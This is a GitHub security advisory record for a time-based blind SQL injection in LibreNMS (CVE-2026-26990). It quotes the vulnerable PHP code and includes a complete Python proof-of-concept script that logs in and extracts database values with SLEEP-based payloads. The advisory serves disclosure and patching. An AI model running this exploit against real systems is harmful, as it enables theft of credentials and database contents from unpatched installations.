{
  "credits": [
    {
      "type": "reporter",
      "user": {
        "avatar_url": "https://avatars.githubusercontent.com/u/108401257?v=4",
        "events_url": "https://api.github.com/users/quirmz/events{/privacy}",
        "followers_url": "https://api.github.com/users/quirmz/followers",
        "following_url": "https://api.github.com/users/quirmz/following{/other_user}",
        "gists_url": "https://api.github.com/users/quirmz/gists{/gist_id}",
        "gravatar_id": "",
        "html_url": "https://github.com/quirmz",
        "id": 108401257,
        "login": "quirmz",
        "node_id": "U_kgDOBnYSaQ",
        "organizations_url": "https://api.github.com/users/quirmz/orgs",
        "received_events_url": "https://api.github.com/users/quirmz/received_events",
        "repos_url": "https://api.github.com/users/quirmz/repos",
        "site_admin": false,
        "starred_url": "https://api.github.com/users/quirmz/starred{/owner}{/repo}",
        "subscriptions_url": "https://api.github.com/users/quirmz/subscriptions",
        "type": "User",
        "url": "https://api.github.com/users/quirmz",
        "user_view_type": "public"
      }
    }
  ],
  "cve_id": "CVE-2026-26990",
  "cvss": {
    "score": 8.8,
    "vector_string": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
  },
  "cvss_severities": {
    "cvss_v3": {
      "score": 8.8,
      "vector_string": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
    },
    "cvss_v4": {
      "score": 0.0,
      "vector_string": null
    }
  },
  "cwes": [
    {
      "cwe_id": "CWE-89",
      "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')"
    }
  ],
  "description": "### Summary\nA time-based blind SQL injection vulnerability exists in `address-search.inc.php` via the `address` parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses.\n\n\n### Details\nThis vulnerability requires authentication and is exploitable by any authenticated user.\n\nThe vulnerable endpoint is at `/ajax_table.php` with the following request displaying the injection point.\n```\nPOST /ajax_table.php HTTP/1.1\nHost: 192.168.236.131\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: http://192.168.236.131\nConnection: keep-alive\nReferer: http://192.168.236.131/search\nCookie: laravel_session=[Authenticated user cookie]\n\ncurrent=1&rowCount=55&sort%5Bhostname%5D=asc&searchPhrase=&id=address-search&search_type=ipv4&device_id=1&interface=&address=127.0.0.1/aa<injected SQL here>\n```\n\nWithin `includes/html/table/address-search.inc.php`, the user-controlled `$prefix` variable derived from the `address` parameter is concatenated directly into the SQL query without sanitization or parameter binding on lines 34 and 52.\n\n```php\n// Lines 16-35, 51-53\n$address = $vars['address'] ?? '';\n$prefix = '';\n$sort = trim((string) $sort);\n\nif (str_contains($address, '/')) {\n    [$address, $prefix] = explode('/', $address, 2);\n}\n\nif ($search_type == 'ipv4') {\n    $sql = ' FROM `ipv4_addresses` AS A, `ports` AS I, `devices` AS D';\n    $sql .= ' WHERE I.port_id = A.port_id AND I.device_id = D.device_id ' . $where . ' ';\n\n    if (! empty($address)) {\n        $sql .= ' AND ipv4_address LIKE ?';\n        $param[] = \"%$address%\";\n    }\n\n    if (! empty($prefix)) {\n        $sql .= \" AND ipv4_prefixlen='$prefix'\";\n    }\n\n......\n\n    if (! empty($prefix)) {\n        $sql .= \" AND ipv6_prefixlen = '$prefix'\";\n    }\n```\n\n\n### PoC\nThe following Python script exploits the time-based blind SQL injection vulnerability to retrieve the value of `SELECT CURRENT_USER()` from the database:\n```python\n#!/usr/bin/python3\n\nimport requests\nimport sys\nimport re\n\nfrom urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n# Configured to be used with burpsuite on the default burpsuite port of 8080\nproxies = {\"http\": \"http://127.0.0.1:8080\", \"https\": \"http://127.0.0.1:8080\"}\n\n# When None is returned it means that all values have been retrieved from the queried value in the target DB\ndef blind_binsearch_sqli(inj_str):\n    try:\n        a = range(32,126)\n        start = 0\n        end = len(a)\n        while start <= end:\n            mid = (start + end) // 2\n            target_equal = inj_str.replace(\"[CHAR]\", str(a[mid]))\n            target_less = inj_str.replace(\"=[CHAR]\", f\"<{a[mid]}\")\n\n            # Return ascii decimal value for storing to a local string buffer\n            if condition(target_equal):\n                return a[mid]\n            # Use lower half of the \"a\" array\n            elif condition(target_less):\n                end = mid - 1\n            # Use upper half of the \"a\" array\n            else:\n                start = mid + 1\n        return None\n    except IndexError:\n        return None\n\n\n# Check injection result\ndef condition(payload):\n    exploit_data = {\n    \"current\": \"1\",\n    \"rowCount\": \"50\",\n    \"sort[hostname]\": \"asc\",\n    \"searchPhrase\": \"\",\n    \"id\": \"address-search\",\n    \"search_type\": \"ipv4\",\n    \"device_id\": \"1\",\n    \"interface\": \"\",\n    \"address\": f\"127.0.0.1/aa{payload}\"\n    }\n    # Payload must be slotted in somewhere in this code\n    payload_url = f\"{url}/ajax_table.php\"\n\n    r = s.post(payload_url, data=exploit_data)\n\n    elapsed_time_seconds = r.elapsed.total_seconds()\n\n    # If response time is within sleep function delay range of +1 or -1 second the query returned \"true\"\n    if (elapsed_time_seconds + 1) > (sleep_delay * 2) and (elapsed_time_seconds - 1) < (sleep_delay * 2):\n        return True\n    else:\n        return False\n\n\ndef get_length(inj):\n    length = 0\n    print(f\"(+) Getting the length of \\\"{inj}\\\"\")\n    while True:\n        # MySQL\n        #length_injection_string = f\" AND LENGTH(({inj}))={str(length)}-- -\"\n        length_injection_string = f\"' AND (SELECT 1 FROM (SELECT IF(LENGTH(({inj}))={str(length)},SLEEP({sleep_delay}),0))x) AND '1'='1\"\n\n        bool_value = condition(length_injection_string)\n\n        if bool_value == False:\n            length += 1\n        else:\n            return length\n\n\ndef injection(inject_qry):\n    extracted = \"\"\n    length = get_length(inject_qry)\n    print(f\"Length of \\\"{inject_qry}\\\": {length}\")\n    print(f\"(+) Retrieving the value for \\\"{inject_qry}\\\"\")\n\n    # +2 to length in order to automatically stop the injection once the None value is returned, meaning that the whole query value is extracted\n    for i in range(1, length + 2):\n        # MySQL\n        injection_string = f\"' AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING(({inject_qry}),{i},1))=[CHAR],SLEEP({sleep_delay}),0))x) AND '1'='1\"\n\n        retrieved_value = blind_binsearch_sqli(injection_string)\n\n        if retrieved_value:\n            extracted += chr(retrieved_value)\n            extracted_char = chr(retrieved_value)\n            print(extracted_char, flush=True, end=\"\")\n        elif retrieved_value == None:\n            print(\"\\n(+) done!\\n\")\n            return extracted\n\nglobal url\nglobal s\nglobal sleep_delay\nglobal username\nglobal password\n\n# Default sleep delay, due to injection query used the response time will be sleep_delay * 2\nsleep_delay = 1.5\n\ns = requests.Session()\n\n# HTTPS\ns.verify = False\n\n# Toggle debug proxy\n#s.proxies.update(proxies)\n\nurl = \"http://192.168.236.131\"\n\nusername = \"tester2\"\npassword = \"Adminbazinga\"\n\nif len(sys.argv) > 1:\n    url = sys.argv[1]\nif len(sys.argv) > 2:\n    username = sys.argv[2]\nif len(sys.argv) > 3:\n    password = sys.argv[3]\nif len(sys.argv) > 4:\n    sleep_delay = float(sys.argv[4])\n\nr = s.get(url + \"/login\")\n\nlogin_token = re.search(r\"name=\\\"_token\\\"\\s+value=\\\"([^\\\"]+)\\\"\", r.text).group(1)\n\nlogin_data = {\n\"_token\": login_token,\n\"username\": username,\n\"password\": password,\n\"submit\": \"\"\n}\n\nr = s.post(url + \"/login\", data=login_data)\n\n# Example: python3 script.py http://127.0.0.1 username password 1.5\nif __name__ == \"__main__\":\n    injection(\"SELECT CURRENT_USER()\")\n```\n\nTester user role:\n<img width=\"771\" height=\"154\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fe13754c-9a41-48cb-934d-575097675c13\" />\n\n\nExample usage of PoC script:\n<img width=\"924\" height=\"104\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6b1e19a9-4c73-4e44-8e16-851ff92d5960\" />\n\n\n### Impact\n* Any authenticated user can exploit this vulnerability to extract sensitive information from the back-end database using time‑based blind SQL injection techniques.\n* This leads to unauthorised disclosure of database contents, including schema information and potentially sensitive application data.\n* An attacker can retrieve privileged accounts (e.g. administrative usernames) and their associated password hashes, potentially leading to privilege escalation within LibreNMS by cracking the password hashes and obtaining plaintext admin user credentials.",
  "ghsa_id": "GHSA-79q9-wc6p-cf92",
  "github_reviewed_at": "2026-02-18T22:31:37Z",
  "html_url": "https://github.com/advisories/GHSA-79q9-wc6p-cf92",
  "identifiers": [
    {
      "type": "GHSA",
      "value": "GHSA-79q9-wc6p-cf92"
    },
    {
      "type": "CVE",
      "value": "CVE-2026-26990"
    }
  ],
  "nvd_published_at": null,
  "published_at": "2026-02-18T22:31:37Z",
  "references": [
    "https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92",
    "https://github.com/librenms/librenms/pull/18777",
    "https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1",
    "https://github.com/advisories/GHSA-79q9-wc6p-cf92"
  ],
  "repository_advisory_url": "https://api.github.com/repos/librenms/librenms/security-advisories/GHSA-79q9-wc6p-cf92",
  "severity": "high",
  "source_code_location": "https://github.com/librenms/librenms",
  "summary": "LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php",
  "type": "reviewed",
  "updated_at": "2026-02-18T22:31:38Z",
  "url": "https://api.github.com/advisories/GHSA-79q9-wc6p-cf92",
  "vulnerabilities": [
    {
      "first_patched_version": "26.2.0",
      "package": {
        "ecosystem": "composer",
        "name": "librenms/librenms"
      },
      "vulnerable_functions": [],
      "vulnerable_version_range": "< 26.2.0"
    }
  ],
  "withdrawn_at": null
}